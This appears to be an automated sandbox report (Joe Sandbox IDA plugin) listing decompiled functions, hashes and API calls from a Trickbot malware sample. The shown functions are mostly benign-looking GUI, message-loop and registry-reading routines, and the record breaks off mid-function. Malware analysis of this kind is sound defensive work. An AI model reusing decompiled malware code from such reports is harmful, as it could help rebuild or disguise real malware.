Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: 70d66128338aa67618be67a9b04304a7c91d9809e7b6a2268bc8d0f082be7a8c
Instruction ID: 7e8450aacf1d13b48321d40fd18e533748c57d59c8ea8b951260583766f53849
Opcode Fuzzy Hash: 70d66128338aa67618be67a9b04304a7c91d9809e7b6a2268bc8d0f082be7a8c
Instruction Fuzzy Hash: E6117071600204BBDB219FB6CD8AEAFBABEEF85744F00042EF609D1151D77A9D509B6C

Uniqueness

Uniqueness Score: -1.00%

Function 0042FA78, Relevance: 12.1, APIs: 8, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0042FA78(intOrPtr __ecx) {
				int _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				intOrPtr _t24;
				intOrPtr _t26;
				int _t35;
				long _t39;
				intOrPtr _t40;
				int _t42;
				void* _t43;

				_v12 = __ecx;
				_v8 = GetSystemMetrics(6);
				_t39 = GetSystemMetrics(5);
				_t35 = GetSystemMetrics(0x21);
				_t42 = GetSystemMetrics(0x20);
				_v28.top = _v8;
				_t24 =  *0x44b728; // 0x0
				_v28.left = _t39;
				_v28.right = _t24 - _t39;
				_t26 =  *0x44b72c; // 0x0
				_v28.bottom = _t26;
				if((E0041B66F(_v12) & 0x00040600) != 0) {
					OffsetRect( &_v28, _t42 - _t39, _t35 - _v8);
				}
				_t40 = _v12;
				_push(GetWindowDC( *(_t40 + 0x1c)));
				_t43 = E00420D46();
				InvertRect( *(_t43 + 4),  &_v28);
				return ReleaseDC( *(_t40 + 0x1c),  *(_t43 + 4));
			}

0x0042fa87
0x0042fa90
0x0042fa97
0x0042fa9d
0x0042faa1
0x0042faa9
0x0042faac
0x0042fab1
0x0042fab6
0x0042fab9
0x0042fabe
0x0042facb
0x0042fad8
0x0042fad8
0x0042fade
0x0042faea
0x0042faf0
0x0042faf9
0x0042fb0f

APIs

GetSystemMetrics.USER32(00000006), ref: 0042FA8C
GetSystemMetrics.USER32(00000005), ref: 0042FA93
GetSystemMetrics.USER32(00000021), ref: 0042FA99
GetSystemMetrics.USER32(00000020), ref: 0042FA9F

Part of subcall function 0041B66F: GetWindowLongA.USER32(?,000000F0), ref: 0041B67B

OffsetRect.USER32(?,00000000,?), ref: 0042FAD8
GetWindowDC.USER32(?), ref: 0042FAE4
InvertRect.USER32(?,?), ref: 0042FAF9
ReleaseDC.USER32(?,?), ref: 0042FB05

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: MetricsSystem$RectWindow$InvertLongOffsetRelease
String ID:
API String ID: 2500086165-0
Opcode ID: e9687727baa0fc282bcf067000db350be6c9e0aa61a3222eef07cbe541145d50
Instruction ID: 20cf1554b06661d00d5ad6d06b17a24645c94d55b0a7ae413178814da4ea3e85
Opcode Fuzzy Hash: e9687727baa0fc282bcf067000db350be6c9e0aa61a3222eef07cbe541145d50
Instruction Fuzzy Hash: 4211E676D00218ABCB109FF9DD4999EBFB8EB48360F104566EA05E3250D7B5AD40CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00428FDD, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 160
keyboardtimeCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00428FDD(void* __ebx, intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				struct tagPOINT _v28;
				intOrPtr _v36;
				signed char _v65;
				char _v72;
				void* _t58;
				void* _t60;
				intOrPtr _t64;
				intOrPtr _t67;
				intOrPtr _t110;
				intOrPtr _t111;
				intOrPtr* _t113;

				_t110 = _a4;
				_t113 = __ecx;
				if(E00419115(__ecx, _t110) != 0) {
					L38:
					_t58 = 1;
					return _t58;
				}
				_t111 =  *((intOrPtr*)(_t110 + 4));
				_v20 = E004043F9(__ecx);
				if(( *(__ecx + 0x64) & 0x00000020) != 0 || _t111 == 0x201 || _t111 == 0x202) {
					if(_t111 < 0x200 || _t111 > 0x209) {
						if(_t111 < 0xa0 || _t111 > 0xa9) {
							goto L30;
						} else {
							goto L8;
						}
					} else {
						L8:
						_v16 = E00432335();
						_t67 = _a4;
						_v28.y =  *((intOrPtr*)(_t67 + 0x18));
						_v28.x =  *(_t67 + 0x14);
						ScreenToClient( *(_t113 + 0x1c),  &_v28);
						E00405360( &_v72, 0, 0x2c);
						_v72 = 0x28;
						_v8 =  *((intOrPtr*)( *_t113 + 0x64))(_v28.x, _v28.y,  &_v72);
						if(_v36 != 0xffffffff) {
							E004053B8(_v36);
						}
						if(_t111 != 0x201 || (_v65 & 0x00000080) == 0) {
							_v12 = _v12 & 0x00000000;
							if(_t111 != 0x201 && GetKeyState(1) < 0) {
								_v8 =  *((intOrPtr*)(_v16 + 0x104));
							}
						} else {
							_v12 = 1;
						}
						if(_v8 < 0 || _v12 != 0) {
							if(GetKeyState(1) >= 0 || _v12 != 0) {
								 *((intOrPtr*)( *_t113 + 0xdc))(0xffffffff);
								KillTimer( *(_t113 + 0x1c), 0xe001);
							}
							goto L29;
						} else {
							if(_t111 != 0x202) {
								if(( *(_t113 + 0x60) & 0x00000008) != 0 || GetKeyState(1) < 0) {
									 *((intOrPtr*)( *_t113 + 0xdc))(_v8);
								} else {
									if(_v8 ==  *((intOrPtr*)(_v16 + 0x104))) {
										L29:
										 *((intOrPtr*)(_v16 + 0x104)) = _v8;
										goto L30;
									}
									_push(0x12c);
									_push(0xe000);
									L20:
									E00428DA0(_t113);
								}
								goto L29;
							}
							 *((intOrPtr*)( *_t113 + 0xdc))(0xffffffff);
							_push(0xc8);
							_push(0xe001);
							goto L20;
						}
					}
				} else {
					L30:
					_t60 = E00419EDA(_t113);
					if(_t60 == 0 ||  *((intOrPtr*)(_t60 + 0x50)) == 0) {
						if(_v20 == 0) {
							L36:
							return E0041AFF4(_a4);
						} else {
							goto L34;
						}
						while(1) {
							L34:
							_t112 = _v20;
							_push(_a4);
							if( *((intOrPtr*)( *_v20 + 0x90))() != 0) {
								goto L38;
							}
							_t64 = E00419D7A(_t112);
							_v20 = _t64;
							if(_t64 != 0) {
								continue;
							}
							goto L36;
						}
						goto L38;
					} else {
						return 0;
					}
				}
			}

0x00428fe5
0x00428fe8
0x00428ff2
0x004291d1
0x004291d3
0x00000000
0x004291d3
0x00428ff8
0x00429007
0x0042900f
0x00429027
0x00429037
0x00000000
0x00000000
0x00000000
0x00000000
0x00429049
0x00429049
0x0042904e
0x00429051
0x0042905a
0x00429061
0x00429067
0x00429075
0x00429082
0x00429099
0x0042909c
0x004290a1
0x004290a6
0x004290a9
0x004290ba
0x004290c0
0x004290d8
0x004290d8
0x004290b1
0x004290b1
0x004290b1
0x004290df
0x00429155
0x00429163
0x00429171
0x00429171
0x00000000
0x004290e7
0x004290ed
0x00429112
0x00429142
0x00429121
0x0042912d
0x00429177
0x0042917d
0x00000000
0x0042917d
0x0042912f
0x00429134
0x00429105
0x00429107
0x00429107
0x00000000
0x00429112
0x004290f5
0x004290fb
0x00429100
0x00000000
0x00429100
0x004290df
0x00429183
0x00429183
0x00429185
0x0042918d
0x0042919d
0x004291c1
0x00000000
0x00000000
0x00000000
0x00000000
0x0042919f
0x0042919f
0x0042919f
0x004291a2
0x004291b1
0x00000000
0x00000000
0x004291b5
0x004291bc
0x004291bf
0x00000000
0x00000000
0x00000000
0x004291bf
0x00000000
0x00429195
0x00000000
0x00429195
0x0042918d

APIs

Part of subcall function 004043F9: GetParent.USER32(?), ref: 00404403

ScreenToClient.USER32(?,?), ref: 00429067
GetKeyState.USER32(00000001), ref: 004290C4
GetKeyState.USER32(00000001), ref: 00429116
GetKeyState.USER32(00000001), ref: 0042914C
KillTimer.USER32(?,0000E001), ref: 00429171

Strings

(, xrefs: 00429082

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: State$ClientKillParentScreenTimer
String ID: (
API String ID: 2757461879-3887548279
Opcode ID: 99708c99224e2de77ad7276b3c19d6ceab9830e13a6620b52319f3961abafa49
Instruction ID: 0f21b9813812b9d55b8571ada79f830b202ea128cc7ea093b184e42a1602d1c4
Opcode Fuzzy Hash: 99708c99224e2de77ad7276b3c19d6ceab9830e13a6620b52319f3961abafa49
Instruction Fuzzy Hash: E351C031B0022AAFEF249F95D84CBBE7BB1AF44314F54006BE905A72D1C7B89D91CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00413961, Relevance: 10.6, APIs: 7, Instructions: 140
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00413961(void* __eax, intOrPtr* __ebx, signed int __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagPAINTSTRUCT _v64;
				signed int* _t16;
				struct HDC__* _t46;
				int _t55;
				struct HDC__* _t58;
				struct HDC__* _t60;
				struct HWND__* _t65;
				void* _t73;
				void* _t74;

				_t16 = __eax +  *__ebx + 5;
				 *__ecx =  *__ecx | __ecx;
				es = es;
				 *__ecx =  *__ecx | __ecx;
				 *_t16 =  *_t16 | __ecx;
				 *_t16 =  *_t16 | __ecx;
				asm("int3");
				_t74 = _t73 - 0x40;
				_push(__ebx);
				_t55 = _a8;
				_t87 = _t55 - 0x82;
				if(_t55 != 0x82) {
					_t65 = _a4;
					__eflags = GetPropA(_t65, 0);
					if(__eflags == 0) {
						__eflags = _t55 - 0xf;
						if(__eflags > 0) {
							__eflags = _t55 - 0x1943;
							if(__eflags < 0) {
								goto L10;
							} else {
								__eflags = _t55 - 0x1944;
								if(__eflags <= 0) {
									 *_a16 = 1;
									return 0x3ec;
								} else {
									goto L10;
								}
							}
						} else {
							if(__eflags == 0) {
								_t46 = _a12;
								_t58 = _t46;
								__eflags = _t58;
								if(_t58 == 0) {
									_t58 = BeginPaint(_t65,  &_v64);
									E00410AD0(_t65, _t30);
									_t74 = _t74 + 8;
								}
								E004137D0(_t65, _t58);
								__eflags = _t46;
								if(_t46 == 0) {
									EndPaint(_t65,  &_v64);
								}
								__eflags = 0;
								return 0;
							} else {
								__eflags = _t55 - 0xa;
								if(__eflags == 0) {
									_t60 = GetDC(_t65);
									E00410AD0(_t65, _t32);
									E004137D0(_t65, _t60);
									ReleaseDC(_t65, _t60);
									__eflags = 0;
									return 0;
								} else {
									L10:
									return CallWindowProcA(E00410610(__eflags, _t65, 4), _t65, _t55, _a12, _a16);
								}
							}
						}
					} else {
						return CallWindowProcA(E00410610(__eflags, _t65, 4), _t65, _t55, _a12, _a16);
					}
				} else {
					return E00410840(_t87, _a4, _t55, _a12, _a16, 4);
				}
			}

0x00413963
0x00413966
0x00413968
0x00413969
0x0041396b
0x0041396d
0x0041396f
0x00413970
0x00413973
0x00413976
0x0041397a
0x00413980
0x004139a7
0x004139b9
0x004139bb
0x004139e4
0x004139e7
0x004139f2
0x004139f8
0x00000000
0x004139fa
0x004139fa
0x00413a00
0x00413aab
0x00413ab9
0x00000000
0x00000000
0x00000000
0x00413a00
0x004139e9
0x004139e9
0x00413a5d
0x00413a61
0x00413a63
0x00413a65
0x00413a74
0x00413a77
0x00413a7c
0x00413a7c
0x00413a81
0x00413a89
0x00413a8b
0x00413a93
0x00413a93
0x00413a99
0x00413aa1
0x004139eb
0x004139eb
0x004139ee
0x00413a35
0x00413a38
0x00413a42
0x00413a4c
0x00413a52
0x00413a5a
0x004139f0
0x00413a06
0x00413a2a
0x00413a2a
0x004139ee
0x004139e9
0x004139bd
0x004139e1
0x004139e1
0x00413982
0x004139a2
0x004139a2

APIs

GetPropA.USER32(?,00000000), ref: 004139B3
CallWindowProcA.USER32(00000000), ref: 004139D5

Part of subcall function 00410840: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 00410866
Part of subcall function 00410840: RemovePropA.USER32(?,00000000), ref: 0041087E
Part of subcall function 00410840: RemovePropA.USER32(?,00000000), ref: 0041088A

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Prop$CallProcRemoveWindow
String ID:
API String ID: 2276450057-0
Opcode ID: 6fee93ec7ca43d0762215e20fa488f34072c8f9a387738dd55526872c13f8751
Instruction ID: f1572104d6aad6c7c6e2dfa605bf4f658f6bdfab918f599bf59773d80d73c62f
Opcode Fuzzy Hash: 6fee93ec7ca43d0762215e20fa488f34072c8f9a387738dd55526872c13f8751
Instruction Fuzzy Hash: C931F6B77002106BD2019B95AC85EEFB75CDFD53A6F040426F94587201D3B95E4A87BA

Uniqueness

Uniqueness Score: -1.00%

Function 0041B024, Relevance: 10.6, APIs: 7, Instructions: 122
windowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0041B024(intOrPtr* __ecx) {
				struct HWND__* _t45;
				intOrPtr* _t54;
				int _t63;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr* _t78;
				struct tagMSG* _t80;
				void* _t81;

				_t67 = 1;
				_t78 = __ecx;
				 *((intOrPtr*)(_t81 + 0x18)) = _t67;
				 *(_t81 + 0x14) = 0;
				if(( *(_t81 + 0x28) & 0x00000004) == 0) {
					L2:
					 *((intOrPtr*)(_t81 + 0x10)) = 0;
					L3:
					_t45 = GetParent( *(_t78 + 0x1c));
					 *(_t78 + 0x24) =  *(_t78 + 0x24) | 0x00000018;
					 *(_t81 + 0x1c) = _t45;
					_t80 = E0041C00C() + 0x30;
					L4:
					while( *((intOrPtr*)(_t81 + 0x18)) == 0 || PeekMessageA(_t80, 0, 0, 0, 0) != 0) {
						while( *((intOrPtr*)( *((intOrPtr*)(E0041C00C())) + 0x5c))() != 0) {
							if( *((intOrPtr*)(_t81 + 0x10)) != 0) {
								_t63 = _t80->message;
								if(_t63 == 0x118 || _t63 == 0x104) {
									E0041B7D3(_t78, 1);
									UpdateWindow( *(_t78 + 0x1c));
									 *((intOrPtr*)(_t81 + 0x10)) = 0;
								}
							}
							if( *((intOrPtr*)( *_t78 + 0x70))() == 0) {
								 *(_t78 + 0x24) =  *(_t78 + 0x24) & 0xffffffe7;
								return  *((intOrPtr*)(_t78 + 0x2c));
							} else {
								_t54 = E0041C00C();
								_push(_t80);
								if( *((intOrPtr*)( *_t54 + 0x64))() != 0) {
									 *((intOrPtr*)(_t81 + 0x18)) = 1;
									 *(_t81 + 0x14) = 0;
								}
								if(PeekMessageA(_t80, 0, 0, 0, 0) != 0) {
									continue;
								} else {
									goto L4;
								}
							}
						}
						return E00437058(0) | 0xffffffff;
					}
					if( *((intOrPtr*)(_t81 + 0x10)) != 0) {
						E0041B7D3(_t78, 1);
						UpdateWindow( *(_t78 + 0x1c));
						 *((intOrPtr*)(_t81 + 0x10)) = 0;
					}
					if(( *(_t81 + 0x24) & 0x00000001) == 0 &&  *(_t81 + 0x1c) != 0 &&  *(_t81 + 0x14) == 0) {
						SendMessageA( *(_t81 + 0x28), 0x121, 0,  *(_t78 + 0x1c));
					}
					if(( *(_t81 + 0x24) & 0x00000002) != 0) {
						L14:
						 *((intOrPtr*)(_t81 + 0x18)) = 0;
						goto L4;
					} else {
						 *(_t81 + 0x14) =  *(_t81 + 0x14) + 1;
						if(SendMessageA( *(_t78 + 0x1c), 0x36a, 0,  *(_t81 + 0x14)) != 0) {
							goto L4;
						}
						goto L14;
					}
				}
				_t66 = E0041B66F(__ecx);
				 *((intOrPtr*)(_t81 + 0x10)) = _t67;
				if((_t66 & 0x10000000) == 0) {
					goto L3;
				}
				goto L2;
			}

0x0041b034
0x0041b035
0x0041b037
0x0041b03b
0x0041b03f
0x0041b051
0x0041b051
0x0041b055
0x0041b058
0x0041b05e
0x0041b062
0x0041b073
0x00000000
0x0041b076
0x0041b0f2
0x0041b106
0x0041b108
0x0041b110
0x0041b11d
0x0041b125
0x0041b127
0x0041b127
0x0041b110
0x0041b134
0x0041b172
0x00000000
0x0041b136
0x0041b136
0x0041b13d
0x0041b145
0x0041b147
0x0041b14f
0x0041b14f
0x0041b160
0x00000000
0x0041b162
0x00000000
0x0041b162
0x0041b160
0x0041b134
0x00000000
0x0041b16d
0x0041b08f
0x0041b095
0x0041b09d
0x0041b09f
0x0041b09f
0x0041b0a8
0x0041b0c3
0x0041b0c3
0x0041b0ce
0x0041b0ec
0x0041b0ec
0x00000000
0x0041b0d0
0x0041b0d4
0x0041b0ea
0x00000000
0x00000000
0x00000000
0x0041b0ea
0x0041b0ce
0x0041b041
0x0041b04b
0x0041b04f
0x00000000
0x00000000
0x00000000

APIs

GetParent.USER32(?), ref: 0041B058
PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 0041B081
UpdateWindow.USER32(?), ref: 0041B09D
SendMessageA.USER32(?,00000121,00000000,?), ref: 0041B0C3
SendMessageA.USER32(?,0000036A,00000000,00000001), ref: 0041B0E2
UpdateWindow.USER32(?), ref: 0041B125
PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 0041B158

Part of subcall function 0041B66F: GetWindowLongA.USER32(?,000000F0), ref: 0041B67B

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 00246c3e6967ef0e80c0ab1cc6dc52d9380ed2ccbf97ad08c2a39e81431774a6
Instruction ID: 31f445390621a16856a2414b5fbfb049f5f3e82eeee6a95fe5b96b1665f749f0
Opcode Fuzzy Hash: 00246c3e6967ef0e80c0ab1cc6dc52d9380ed2ccbf97ad08c2a39e81431774a6
Instruction Fuzzy Hash: 63419230604741ABD7319F26DC44A5BBFE8FFC5B44F104A1EF49582291C779C985CA9A

Uniqueness

Uniqueness Score: -1.00%

Function 00410920, Relevance: 10.6, APIs: 7, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410920(struct HDC__* _a4, signed short _a8, signed int _a12) {
				long* _v0;
				struct tagRECT _v24;
				signed short _t56;
				long _t57;
				long* _t73;
				long* _t75;
				struct HDC__* _t78;
				long _t79;
				signed short _t81;

				_t78 = _a4;
				_t79 = SetBkColor(_t78,  *(0x44d364 + (_a12 & 0x0000ffff) * 4));
				_t73 = _v0;
				_t75 =  &_v24;
				 *_t75 =  *_t73;
				_t75[1] = _t73[1];
				_t75[2] = _t73[2];
				_t81 = _a12;
				_t75[3] = _t73[3];
				_v24.bottom = _v24.top + 1;
				if((_t81 & 0x00000002) != 0) {
					ExtTextOutA(_t78, 0, 0, 2,  &_v24, 0, 0, 0);
				}
				_v24.bottom = _t73[3];
				_v24.right = _v24.left + 1;
				if((_t81 & 0x00000001) != 0) {
					ExtTextOutA(_t78, 0, 0, 2,  &_v24, 0, 0, 0);
				}
				_t56 = _a8;
				if(_a4 != _t56) {
					SetBkColor(_t78,  *(0x44d364 + (_t56 & 0x0000ffff) * 4));
				}
				_t57 = _t73[2];
				_v24.right = _t57;
				_v24.left = _t57 - 1;
				if((_t81 & 0x00000004) != 0) {
					ExtTextOutA(_t78, 0, 0, 2,  &_v24, 0, 0, 0);
				}
				if((_t81 & 0x00000008) != 0) {
					_v24.left =  *_t73;
					_v24.top = _v24.bottom - 1;
					if((_t81 & 0x00001000) != 0) {
						_v24.right = _v24.right - 2;
					}
					ExtTextOutA(_t78, 0, 0, 2,  &_v24, 0, 0, 0);
				}
				return SetBkColor(_t78, _t79);
			}

0x00410937
0x00410943
0x00410945
0x00410949
0x00410955
0x0041095a
0x0041095d
0x00410960
0x00410965
0x00410972
0x00410976
0x0041098a
0x0041098a
0x00410993
0x004109a1
0x004109a5
0x004109b9
0x004109b9
0x004109bf
0x004109c9
0x004109d7
0x004109d7
0x004109dd
0x004109e0
0x004109ea
0x004109ee
0x00410a02
0x00410a02
0x00410a0d
0x00410a11
0x00410a1f
0x00410a23
0x00410a25
0x00410a25
0x00410a3c
0x00410a3c
0x00410a51

APIs

SetBkColor.GDI32(?), ref: 0041093D
ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0041098A
ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004109B9
SetBkColor.GDI32(?,?), ref: 004109D7
ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00410A02
ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00410A3C
SetBkColor.GDI32(?,00000000), ref: 00410A44

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Text$Color
String ID:
API String ID: 3751486306-0
Opcode ID: 06f5cdfce198b5b2a52e07e810c7c96cfe67ff17812323b5b90734aa62515e25
Instruction ID: 1c061ff726cae08de12fbe614769f7947114dc32f4dedc248ef856f9a42cc059
Opcode Fuzzy Hash: 06f5cdfce198b5b2a52e07e810c7c96cfe67ff17812323b5b90734aa62515e25
Instruction Fuzzy Hash: 15416B70644302AFE320DF14CC86F6AB7E4FB84B40F144819FA54AB2C1D7B5E949CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00431CEE, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102
registryCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00431CEE(void* __ecx, void* __eflags) {
				intOrPtr _t36;
				void* _t37;
				void* _t42;
				intOrPtr* _t61;
				void* _t79;
				void* _t84;

				E00405340(E004382A4, _t84);
				_t79 = __ecx;
				 *(_t84 - 0x14) = 0;
				_t36 = E004287E0(__ecx);
				 *((intOrPtr*)(_t84 - 0x1c)) = _t36;
				if(_t36 != 0) {
					do {
						_t61 = E004287F2(_t79, _t84 - 0x1c);
						if(_t61 != 0) {
							 *((intOrPtr*)( *_t61 + 0xc))(0, 0xfffffffc, 0, 0);
						}
					} while ( *((intOrPtr*)(_t84 - 0x1c)) != 0);
				}
				if( *((intOrPtr*)(_t79 + 0x7c)) != 0) {
					E00417F36(_t84 - 0x10, _t84, "Software\\");
					 *(_t84 - 4) = 0;
					E004181A3(_t84 - 0x10,  *((intOrPtr*)(_t79 + 0x7c)));
					_push(0x43d1e4);
					_push(_t84 - 0x10);
					_push(_t84 - 0x20);
					_t42 = E004180D0(_t84 - 0x10);
					_push( *((intOrPtr*)(_t79 + 0x90)));
					 *(_t84 - 4) = 1;
					_push(_t42);
					_push(_t84 - 0x18);
					E004180D0(_t84 - 0x10);
					 *(_t84 - 4) = 3;
					E00417EC8(_t84 - 0x20);
					E00431E1D(0x80000001, _t84 - 0x18);
					if(RegOpenKeyA(0x80000001,  *(_t84 - 0x10), _t84 - 0x14) == 0) {
						if(RegEnumKeyA( *(_t84 - 0x14), 0, _t84 - 0x12c, 0x104) == 0x103) {
							E00431E1D(0x80000001, _t84 - 0x10);
						}
						RegCloseKey( *(_t84 - 0x14));
					}
					RegQueryValueA(0x80000001,  *(_t84 - 0x18), _t84 - 0x12c, _t84 - 0x24);
					 *(_t84 - 4) = 0;
					E00417EC8(_t84 - 0x18);
					 *(_t84 - 4) =  *(_t84 - 4) | 0xffffffff;
					E00417EC8(_t84 - 0x10);
				}
				_t37 = 1;
				 *[fs:0x0] =  *((intOrPtr*)(_t84 - 0xc));
				return _t37;
			}

0x00431cf3
0x00431d02
0x00431d04
0x00431d07
0x00431d0e
0x00431d11
0x00431d13
0x00431d19
0x00431d20
0x00431d2b
0x00431d2b
0x00431d2e
0x00431d13
0x00431d36
0x00431d45
0x00431d50
0x00431d53
0x00431d5b
0x00431d60
0x00431d64
0x00431d65
0x00431d6a
0x00431d70
0x00431d74
0x00431d78
0x00431d79
0x00431d81
0x00431d85
0x00431d96
0x00431dab
0x00431dc8
0x00431dd1
0x00431dd1
0x00431dd9
0x00431dd9
0x00431dee
0x00431df7
0x00431dfa
0x00431dff
0x00431e06
0x00431e0b
0x00431e11
0x00431e14
0x00431e1c

APIs

__EH_prolog.LIBCMT ref: 00431CF3
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00431DA3
RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 00431DBD
RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00431DD9
RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 00431DEE

Strings

Software\, xrefs: 00431D3D

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: CloseEnumH_prologOpenQueryValue
String ID: Software\
API String ID: 2161548231-964853688
Opcode ID: 6044534ba4ab95e2b99d5af75a520d59b16bff63e35b83b08d7cbd69f13e16e4
Instruction ID: e174d24991b7fd8e2b8e79c395860a4cab1dad34c49fab1acb2e43b429b1a046
Opcode Fuzzy Hash: 6044534ba4ab95e2b99d5af75a520d59b16bff63e35b83b08d7cbd69f13e16e4
Instruction Fuzzy Hash: C2316D7190021AABCF11EBA1CC85DEFBBBDFF09314F50056AF511A2191DB789E45CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0042ABB7, Relevance: 10.6, APIs: 7, Instructions: 97
windowCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0042ABB7(intOrPtr __ecx) {
				void* __edi;
				long _t37;
				void* _t39;
				long _t40;
				intOrPtr* _t42;
				long _t43;
				long _t47;
				int _t48;
				intOrPtr _t53;
				intOrPtr* _t54;
				long _t61;
				void* _t67;
				void* _t72;

				E00405340(E00438940, _t72);
				_t53 = __ecx;
				 *((intOrPtr*)(_t72 - 0x14)) = __ecx;
				_t67 = E0041B5B5(__ecx, 0x64);
				SendMessageA( *(_t67 + 0x1c), 0x184, 0, 0);
				_t54 =  *((intOrPtr*)( *((intOrPtr*)(_t53 + 0x5c)) + 4));
				while(_t54 != 0) {
					_t42 = _t54;
					_t54 =  *_t54;
					_t61 =  *(_t42 + 8);
					_t43 =  *0x447478; // 0x44748c
					 *(_t72 - 0x18) = _t61;
					 *(_t72 - 0x10) = _t43;
					 *(_t72 - 4) =  *(_t72 - 4) & 0x00000000;
					_push(2);
					_push(_t72 - 0x10);
					if( *((intOrPtr*)( *_t61 + 0x64))() == 0) {
						L6:
						 *(_t72 - 4) =  *(_t72 - 4) | 0xffffffff;
						E00417EC8(_t72 - 0x10);
						continue;
					} else {
						_t47 =  *(_t72 - 0x10);
						if( *((intOrPtr*)(_t47 - 8)) == 0) {
							goto L6;
						} else {
							_t48 = SendMessageA( *(_t67 + 0x1c), 0x180, 0, _t47);
							if(_t48 == 0xffffffff) {
								E004179AE( *((intOrPtr*)(_t72 - 0x14)), 0xffffffff);
								 *(_t72 - 4) =  *(_t72 - 4) | 0xffffffff;
								E00417EC8(_t72 - 0x10);
								_t39 = 0;
							} else {
